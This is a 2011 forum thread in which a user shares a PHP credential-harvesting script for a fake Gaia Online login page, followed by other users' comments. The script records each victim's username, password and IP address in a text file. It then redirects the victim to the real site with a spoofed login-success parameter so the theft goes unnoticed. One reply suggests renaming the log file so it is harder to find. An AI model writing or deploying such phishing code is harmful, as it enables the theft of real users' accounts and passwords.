Please rep +Code:<?php // Gaia Online Log In PHP Script. // Variables. $Username = $_POST['username']; $Password = $_POST['password']; $IP = $_SERVER['REMOTE_ADDR']; // Place Gaian's data in text file. file_put_contents('Info.txt', "Username: $Username | Password: $Password | I.P. Address: $IP \n", FILE_APPEND); // Redirect them to Gaia. (With proper login_success Unix timestamp) header('Location: http://www.gaiaonline.com/?login_success=' . time()); // Made by: iyan @ lg. ?>
Results 1 to 6 of 6
- 19 Mar. 2011 11:12am #1
[PHP] Decent GaiaOnline FLP Login.php
- 19 Mar. 2011 01:26pm #2
Yeah, this is descent, but not "top of the line".
My Skillz
~Programing: VB.NET, C#
~HTML Coding:FLP/FMP
~Amateur Python Coder
- 19 Mar. 2011 02:40pm #3
You did a lot of useless things here. It's about as useful as the others you see. Eh.
You see, you have those variables declared, but they aren't variables. They never change.
info.text is also rather pointless. This is something you don't want people to find. It should be named better than that.Last edited by Personoid; 19 Mar. 2011 at 03:30pm.
- 07 Apr. 2011 01:01am #4
I guess people should know that.
- 08 Apr. 2011 07:24am #5
ya . .anywhere nice job. but u done a bit mistake.. i not sure whether its urs for mine
- 21 Apr. 2011 12:04am #6
Yeah, it's decent and also made by me. I have posted it on 3-4 other sites, before this post was made for 2-3 of them. I can provide links if requested.